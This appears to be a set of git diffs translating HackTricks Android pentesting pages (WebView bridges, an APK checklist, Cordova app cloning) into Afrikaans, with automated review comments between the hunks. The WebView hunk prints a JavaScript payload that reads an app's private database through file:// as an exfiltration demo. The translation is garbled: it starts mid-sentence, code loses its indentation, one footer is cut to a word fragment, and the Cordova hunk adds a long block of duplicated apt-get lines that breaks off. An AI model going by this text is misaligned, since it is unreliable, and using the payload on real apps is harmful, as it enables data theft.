vulnerability allowing remote code execution through malicious JavaScript, exploiting reflection. 
- -#### Implementing a JavaScript Bridge - -- **JavaScript interfaces** can interact with native code, as shown in the examples where a class method is exposed to JavaScript: +#### Implementering van 'n JavaScript-brug +- **JavaScript-brûe** kan met nagtiewe kode interaksie hê, soos in die voorbeelde waar 'n klasmetode aan JavaScript blootgestel word: ```javascript @JavascriptInterface public String getSecret() { - return "SuperSecretPassword"; +return "SuperSecretPassword"; }; ``` - -- JavaScript Bridge is enabled by adding an interface to the WebView: - +- JavaScript-brug is geaktiveer deur 'n koppelvlak by die WebView te voeg: ```javascript webView.addJavascriptInterface(new JavascriptBridge(), "javascriptBridge"); webView.reload(); ``` - -- Potential exploitation through JavaScript, for instance, via an XSS attack, enables the calling of exposed Java methods: - +- Potensiële uitbuiting deur middel van JavaScript, byvoorbeeld deur 'n XSS-aanval, maak dit moontlik om blootgestelde Java-metodes aan te roep: ```html ``` +- Om risiko's te verminder, **beperk die gebruik van die JavaScript-brug** tot kode wat saam met die APK versprei word en voorkom die laai van JavaScript vanaf afgeleë bronne. Stel die minimum API-vlak op 17 vir ouer toestelle. -- To mitigate risks, **restrict JavaScript bridge usage** to code shipped with the APK and prevent loading JavaScript from remote sources. For older devices, set the minimum API level to 17. +### Refleksie-gebaseerde afstandsbeheeruitvoering (RCE) -### Reflection-based Remote Code Execution (RCE) +- 'n Gedokumenteerde metode maak dit moontlik om RCE te bereik deur refleksie deur die uitvoering van 'n spesifieke lading. Die `@JavascriptInterface`-annotasie voorkom egter ongemagtigde metode-toegang, wat die aanvalsvlak beperk. -- A documented method allows achieving RCE through reflection by executing a specific payload. 
However, the `@JavascriptInterface` annotation prevents unauthorized method access, limiting the attack surface. +### Afstandsoplossing -### Remote Debugging +- **Afstandsoplossing** is moontlik met **Chrome Developer Tools**, wat interaksie en willekeurige JavaScript-uitvoering binne die WebView-inhoud moontlik maak. -- **Remote debugging** is possible with **Chrome Developer Tools**, enabling interaction and arbitrary JavaScript execution within the WebView content. - -#### Enabling Remote Debugging - -- Remote debugging can be enabled for all WebViews within an application by: +#### Aktivering van afstandsoplossing +- Afstandsoplossing kan geaktiveer word vir alle WebViews binne 'n toepassing deur: ```java if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { - WebView.setWebContentsDebuggingEnabled(true); +WebView.setWebContentsDebuggingEnabled(true); } ``` - -- To conditionally enable debugging based on the application's debuggable state: - +- Om voorwaardelik foutopsporing in te skakel gebaseer op die toestand van die toepassing se debuggable eigenschap: ```java if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { - if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE)) - { WebView.setWebContentsDebuggingEnabled(true); } +if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE)) +{ WebView.setWebContentsDebuggingEnabled(true); } } ``` +## Uitlek van willekeurige lêers -## Exfiltrate arbitrary files - -- Demonstrates the exfiltration of arbitrary files using an XMLHttpRequest: - +- Toon die uitlek van willekeurige lêers deur gebruik te maak van 'n XMLHttpRequest: ```javascript var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { - if (xhr.readyState == XMLHttpRequest.DONE) { - alert(xhr.responseText); - } +if (xhr.readyState == XMLHttpRequest.DONE) { +alert(xhr.responseText); +} } xhr.open('GET', 'file:///data/data/com.authenticationfailure.wheresmybrowser/databases/super_secret.db', true); 
xhr.send(null); ``` - - -## References +## Verwysings * [https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html](https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/index.html) * [https://github.com/authenticationfailure/WheresMyBrowser.Android](https://github.com/authenticationfailure/WheresMyBrowser.Android) * [https://developer.android.com/reference/android/webkit/WebView](https://developer.android.com/reference/android/webkit/WebView)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
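Review bot: the translated fenced code in this webview hunk loses its indentation, which the translation must not touch: `- return "SuperSecretPassword";` becomes `+return "SuperSecretPassword";`, `- WebView.setWebContentsDebuggingEnabled(true);` becomes `+WebView.setWebContentsDebuggingEnabled(true);`, and the body of the `xhr.onreadystatechange` handler is flattened the same way; the blank line between each bullet and its opening fence is dropped too, which in GitBook markdown can glue the fence onto the list item. Code inside ``` fences should be carried over byte for byte and only the surrounding prose translated. On the prose side, "Voorsoorsigtigheid" is not a word (the sense of "Caution" is "Versigtigheid"), "nagtiewe" should be "inheemse" for "native", and "Afstandsoplossing" ("remote solution") is wrong for "Remote debugging" while the same hunk correctly uses "foutopsporing" a few lines later; "afstandsbeheeruitvoering" likewise reads as "remote control execution" rather than remote code execution, so the RCE heading should say "afstandskode-uitvoering". Minor, pre-existing on the context line: the adb example uses an en dash in `–es support_url`, which breaks the command when pasted; `-es` is the intended flag.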
diff --git a/mobile-pentesting/android-checklist.md b/mobile-pentesting/android-checklist.md index d6e559304..740ee1e8b 100644 --- a/mobile-pentesting/android-checklist.md +++ b/mobile-pentesting/android-checklist.md @@ -1,95 +1,83 @@ -# Android APK Checklist +# Android APK Kontrolelys
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals) +### [Leer Android-grondbeginsels](android-app-pentesting/#2-android-application-fundamentals) * [ ] [Basics](android-app-pentesting/#fundamentals-review) * [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali) -* [ ] [Entry points](android-app-pentesting/#application-entry-points) - * [ ] [Activities](android-app-pentesting/#launcher-activity) - * [ ] [URL Schemes](android-app-pentesting/#url-schemes) - * [ ] [Content Providers](android-app-pentesting/#services) - * [ ] [Services](android-app-pentesting/#services-1) - * [ ] [Broadcast Receivers](android-app-pentesting/#broadcast-receivers) - * [ ] [Intents](android-app-pentesting/#intents) - * [ ] [Intent Filter](android-app-pentesting/#intent-filter) -* [ ] [Other components](android-app-pentesting/#other-app-components) -* [ ] [How to use ADB](android-app-pentesting/#adb-android-debug-bridge) -* [ ] [How to modify Smali](android-app-pentesting/#smali) +* [ ] [Toegangspunte](android-app-pentesting/#application-entry-points) +* [ ] [Aktiwiteite](android-app-pentesting/#launcher-activity) +* [ ] [URL-skemas](android-app-pentesting/#url-schemes) +* [ ] 
[Inhoudsverskaffers](android-app-pentesting/#services) +* [ ] [Dienste](android-app-pentesting/#services-1) +* [ ] [Uitsaai-ontvangers](android-app-pentesting/#broadcast-receivers) +* [ ] [Intents](android-app-pentesting/#intents) +* [ ] [Intent-filter](android-app-pentesting/#intent-filter) +* [ ] [Ander komponente](android-app-pentesting/#other-app-components) +* [ ] [Hoe om ADB te gebruik](android-app-pentesting/#adb-android-debug-bridge) +* [ ] [Hoe om Smali te wysig](android-app-pentesting/#smali) -### [Static Analysis](android-app-pentesting/#static-analysis) +### [Statiese Analise](android-app-pentesting/#static-analysis) -* [ ] Check for the use of [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), checks for noting if the mobile was rooted, if an emulator is being used and anti-tampering checks. [Read this for more info](android-app-pentesting/#other-checks). -* [ ] Sensitive applications (like bank apps) should check if the mobile is rooted and should actuate in consequence. -* [ ] Search for [interesting strings](android-app-pentesting/#looking-for-interesting-info) (passwords, URLs, API, encryption, backdoors, tokens, Bluetooth uuids...). - * [ ] Special attention to [firebase ](android-app-pentesting/#firebase)APIs. -* [ ] [Read the manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml) - * [ ] Check if the application is in debug mode and try to "exploit" it - * [ ] Check if the APK allows backups - * [ ] Exported Activities - * [ ] Content Providers - * [ ] Exposed services - * [ ] Broadcast Receivers - * [ ] URL Schemes -* [ ] Is the application s[aving data insecurely internally or externally](android-app-pentesting/#insecure-data-storage)? -* [ ] Is there any [password hard coded or saved in disk](android-app-pentesting/#poorkeymanagementprocesses)? Is the app [using insecurely crypto algorithms](android-app-pentesting/#useofinsecureandordeprecatedalgorithms)? 
-* [ ] All the libraries compiled using the PIE flag? -* [ ] Don't forget that there is a bunch of[ static Android Analyzers](android-app-pentesting/#automatic-analysis) that can help you a lot during this phase. +* [ ] Kyk vir die gebruik van [obfuskasie](android-checklist.md#some-obfuscation-deobfuscation-information), kyk of die foon gewortel is, of 'n emulator gebruik word en anti-manipulasie kontroles. [Lees hierdie vir meer inligting](android-app-pentesting/#other-checks). +* [ ] Sensitiewe toepassings (soos banktoepassings) moet kyk of die foon gewortel is en dienooreenkomstig optree. +* [ ] Soek na [interessante strings](android-app-pentesting/#looking-for-interesting-info) (wagwoorde, URL's, API's, enkripsie, agterdeure, tokens, Bluetooth-UUID's...). +* [ ] Spesiale aandag aan [firebase](android-app-pentesting/#firebase)-API's. +* [ ] [Lees die manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml) +* [ ] Kyk of die toepassing in foutopsporingsmodus is en probeer dit "uitbuit" +* [ ] Kyk of die APK rugsteun toelaat +* [ ] Uitgevoerde aktiwiteite +* [ ] Inhoudsverskaffers +* [ ] Blootgestelde dienste +* [ ] Uitsaai-ontvangers +* [ ] URL-skemas +* [ ] Stoor die toepassing data onveilig intern of ekstern op (android-app-pentesting/#insecure-data-storage)? +* [ ] Is daar enige wagwoord wat hardgekoded of op die skyf gestoor word (android-app-pentesting/#poorkeymanagementprocesses)? Gebruik die toepassing onveilige kriptografiese algoritmes (android-app-pentesting/#useofinsecureandordeprecatedalgorithms)? +* [ ] Is al die biblioteke gekompileer met die PIE-vlag? +* [ ] Moenie vergeet dat daar 'n klomp [statiese Android-analise-instrumente](android-app-pentesting/#automatic-analysis) is wat jou baie kan help gedurende hierdie fase. 
-### [Dynamic Analysis](android-app-pentesting/#dynamic-analysis) +### [Dinamiese Analise](android-app-pentesting/#dynamic-analysis) -* [ ] Prepare the environment ([online](android-app-pentesting/#online-dynamic-analysis), [local VM or physical](android-app-pentesting/#local-dynamic-analysis)) -* [ ] Is there any [unintended data leakage](android-app-pentesting/#unintended-data-leakage) (logging, copy/paste, crash logs)? -* [ ] [Confidential information being saved in SQLite dbs](android-app-pentesting/#sqlite-dbs)? -* [ ] [Exploitable exposed Activities](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)? -* [ ] [Exploitable Content Providers](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)? -* [ ] [Exploitable exposed Services](android-app-pentesting/#exploiting-services)? -* [ ] [Exploitable Broadcast Receivers](android-app-pentesting/#exploiting-broadcast-receivers)? -* [ ] Is the application [transmitting information in clear text/using weak algorithms](android-app-pentesting/#insufficient-transport-layer-protection)? is a MitM possible? -* [ ] [Inspect HTTP/HTTPS traffic](android-app-pentesting/#inspecting-http-traffic) - * [ ] This one is really important, because if you can capture the HTTP traffic you can search for common Web vulnerabilities (Hacktricks has a lot of information about Web vulns). -* [ ] Check for possible [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) (probably some static code analysis will help here) -* [ ] [Frida](android-app-pentesting/#frida): Just Frida, use it to obtain interesting dynamic data from the application (maybe some passwords...) 
+* [ ] Berei die omgewing voor ([aanlyn](android-app-pentesting/#online-dynamic-analysis), [plaaslike VM of fisiese](android-app-pentesting/#local-dynamic-analysis)) +* [ ] Is daar enige [onbedoelde datalek](android-app-pentesting/#unintended-data-leakage) (logboeke, kopieer/plak, foutlogboeke)? +* [ ] [Vertroulike inligting wat in SQLite-databasisse gestoor word](android-app-pentesting/#sqlite-dbs)? +* [ ] [Uitbuitbare blootgestelde aktiwiteite](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)? +* [ ] [Uitbuitbare inhoudsverskaffers](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)? +* [ ] [Uitbuitbare blootgestelde dienste](android-app-pentesting/#exploiting-services)? +* [ ] [Uitbuitbare uitsaai-ontvangers](android-app-pentesting/#exploiting-broadcast-receivers)? +* [ ] Stuur die toepassing inligting in duidelike teks/maak gebruik van swak algoritmes (android-app-pentesting/#insufficient-transport-layer-protection)? Is 'n MitM-aanval moontlik? +* [ ] [Inspekteer HTTP/HTTPS-verkeer](android-app-pentesting/#inspecting-http-traffic) +* [ ] Hierdie een is baie belangrik, want as jy die HTTP-verkeer kan vasvang, kan jy soek na algemene webkwesbaarhede (Hacktricks het baie inligting oor webkwesbaarhede). +* [ ] Kyk vir moontlike [Android-kliëntkant-injeksies](android-app-pentesting/#android-client-side-injections-and-others) (waarskynlik sal sommige statiese kode-analise hier help) +* [ ] [Frida](android-app-pentesting/#frida): Net Frida, gebruik dit om interessante dinamiese data van die toepassing te verkry (miskien sommige wagwoorde...) -### Some obfuscation/Deobfuscation information +### Sommige obfuskasie/Deobfuskasie-inligting -* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) +* [ ] [Lees hier](android-app-pentesting/#obfuscating-deobfuscating-code)
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. - -{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +Vind kw +* **Deel jou hacking truuks deur PRs in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
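Review bot: the translated footer of android-checklist.md is truncated mid-word: `+Vind kw` replaces the whole Intruder paragraph, the `{% embed url=... %}` block and the first four support bullets, leaving only the last `+* **Deel jou hacking truuks ...**` bullet, so the file as committed ends with a dangling fragment; the full footer needs to be re-translated or restored. Two structural regressions in the checklist body as well: nested items lose their indentation (`- * [ ] [Activities]` becomes `+* [ ] [Aktiwiteite]`), so the sub-items under "Toegangspunte", "Lees die manifest:" and "Inspekteer HTTP/HTTPS-verkeer" are flattened to top level; and three links are broken into bare parentheses, e.g. `+* [ ] Stoor die toepassing data onveilig intern of ekstern op (android-app-pentesting/#insecure-data-storage)?` where the original was `[saving data insecurely internally or externally](android-app-pentesting/#insecure-data-storage)`, with the same problem on the hard-coded password/crypto item and the clear-text transmission item; these should be restored to `[teks](android-app-pentesting/#anchor)` form.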
- diff --git a/mobile-pentesting/cordova-apps.md b/mobile-pentesting/cordova-apps.md index 539620b0b..676a8b350 100644 --- a/mobile-pentesting/cordova-apps.md +++ b/mobile-pentesting/cordova-apps.md @@ -1,87 +1,327 @@ -# Cordova Apps +# Cordova-toepassings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**For further details check [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. This is a sumary: +**Vir verdere besonderhede, kyk na [https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58](https://infosecwriteups.com/recreating-cordova-mobile-apps-to-bypass-security-implementations-8845ff7bdc58)**. Hier is 'n opsomming: -Apache Cordova is recognized for enabling the development of **hybrid applications** using **JavaScript, HTML, and CSS**. It allows the creation of Android and iOS applications; however, it lacks a default mechanism for securing the application's source code. In contrast to React Native, Cordova does not compile the source code by default, which can lead to code tampering vulnerabilities. Cordova utilizes WebView to render applications, exposing the HTML and JavaScript code even after being compiled into APK or IPA files. React Native, conversely, employs a JavaScript VM to execute JavaScript code, offering better source code protection. +Apache Cordova word erken vir die moontlikheid om **hibriede toepassings** te ontwikkel met behulp van **JavaScript, HTML en CSS**. Dit maak die skep van Android- en iOS-toepassings moontlik; egter, dit het nie 'n verstek meganisme vir die beveiliging van die toepassing se bronkode nie. In teenstelling met React Native, kompileer Cordova nie die bronkode standaard nie, wat kan lei tot kode-manipulasie kwesbaarhede. Cordova maak gebruik van WebView om toepassings te vertoon, wat die HTML- en JavaScript-kode blootstel selfs nadat dit in APK- of IPA-lêers gekompileer is. Aan die ander kant gebruik React Native 'n JavaScript VM om JavaScript-kode uit te voer, wat beter bronkodebeskerming bied. 
-### Cloning a Cordova Application +### Kloning van 'n Cordova-toepassing -Before cloning a Cordova application, ensure that NodeJS is installed along with other prerequisites like the Android SDK, Java JDK, and Gradle. The official Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) provides a comprehensive guide for these installations. +Voordat jy 'n Cordova-toepassing kloon, verseker dat NodeJS geïnstalleer is, tesame met ander vereistes soos die Android SDK, Java JDK en Gradle. Die amptelike Cordova [dokumentasie](https://cordova.apache.org/docs/en/11.x/guide/cli/#install-pre-requisites-for-building) bied 'n omvattende gids vir hierdie installasies. -Consider an example application named `Bank.apk` with the package name `com.android.bank`. To access the source code, unzip `bank.apk` and navigate to the `bank/assets/www` folder. This folder contains the complete source code of the application, including HTML and JS files. The application's configuration can be found in `bank/res/xml/config.xml`. - -To clone the application, follow these steps: +Neem byvoorbeeld 'n toepassing genaamd `Bank.apk` met die pakketsnaam `com.android.bank`. Om toegang tot die bronkode te verkry, pak `bank.apk` uit en navigeer na die `bank/assets/www`-map. Hierdie map bevat die volledige bronkode van die toepassing, insluitend HTML- en JS-lêers. Die konfigurasie van die toepassing kan gevind word in `bank/res/xml/config.xml`. +Volg hierdie stappe om die toepassing te kloon: ```bash npm install -g cordova@latest cordova create bank-new com.android.bank Bank cd bank-new ``` +Kopieer die inhoud van `bank/assets/www` na `bank-new/www`, met uitsluiting van `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, en die `plugins/` gids. -Copy the contents of `bank/assets/www` to `bank-new/www`, excluding `cordova_plugins.js`, `cordova.js`, `cordova-js-src/`, and the `plugins/` directory. 
+Spesifiseer die platform (Android of iOS) wanneer jy 'n nuwe Cordova projek skep. Voeg die Android platform by vir die kloning van 'n Android app. Let daarop dat Cordova se platform weergawes en Android API vlakke verskillend is. Raadpleeg die Cordova [dokumentasie](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) vir besonderhede oor platform weergawes en ondersteunde Android APIs. -Specify the platform (Android or iOS) when creating a new Cordova project. For cloning an Android app, add the Android platform. Note that Cordova's platform versions and Android API levels are distinct. Refer to the Cordova [documentation](https://cordova.apache.org/docs/en/11.x/guide/platforms/android/) for details on platform versions and supported Android APIs. - -To determine the appropriate Cordova Android platform version, check the `PLATFORM_VERSION_BUILD_LABEL` in the original application's `cordova.js` file. - -After setting up the platform, install the required plugins. The original application's `bank/assets/www/cordova_plugins.js` file lists all the plugins and their versions. Install each plugin individually as shown below: +Om die toepaslike Cordova Android platform weergawe te bepaal, kyk na die `PLATFORM_VERSION_BUILD_LABEL` in die oorspronklike toepassing se `cordova.js` lêer. +Nadat die platform opgestel is, installeer die vereiste plugins. Die oorspronklike toepassing se `bank/assets/www/cordova_plugins.js` lêer lys al die plugins en hul weergawes. 
Installeer elke plugin afsonderlik soos hieronder getoon: ```bash cd bank-new cordova plugin add cordova-plugin-dialogs@2.0.1 ``` - -If a plugin is not available on npm, it can be sourced from GitHub: - +As 'n invoegtoepassing nie beskikbaar is op npm nie, kan dit vanaf GitHub verkry word: ```bash cd bank-new cordova plugin add https://github.com/moderna/cordova-plugin-cache.git ``` +Maak seker dat al die voorvereistes voldoen word voordat jy begin kompileer: -Ensure all prerequisites are met before compiling: - +```bash +$ sudo apt-get install git wget curl unzip -y +$ sudo apt-get install openjdk-8-jdk -y +$ sudo apt-get install ant -y +$ sudo apt-get install gradle -y +$ sudo apt-get install android-sdk -y +$ sudo apt-get install android-sdk-build-tools -y +$ sudo apt-get install android-sdk-platform-tools -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-build-tools-23 -y +$ sudo apt-get install android-sdk-build-tools-25 -y +$ sudo apt-get install android-sdk-build-tools-26 -y +$ sudo apt-get install android-sdk-build-tools-27 -y +$ sudo apt-get install android-sdk-build-tools-28 -y +$ sudo apt-get install android-sdk-build-tools-29 -y +$ sudo apt-get install android-sdk-build-tools-30 -y +$ sudo apt-get install android-sdk-build-tools-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install 
android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install 
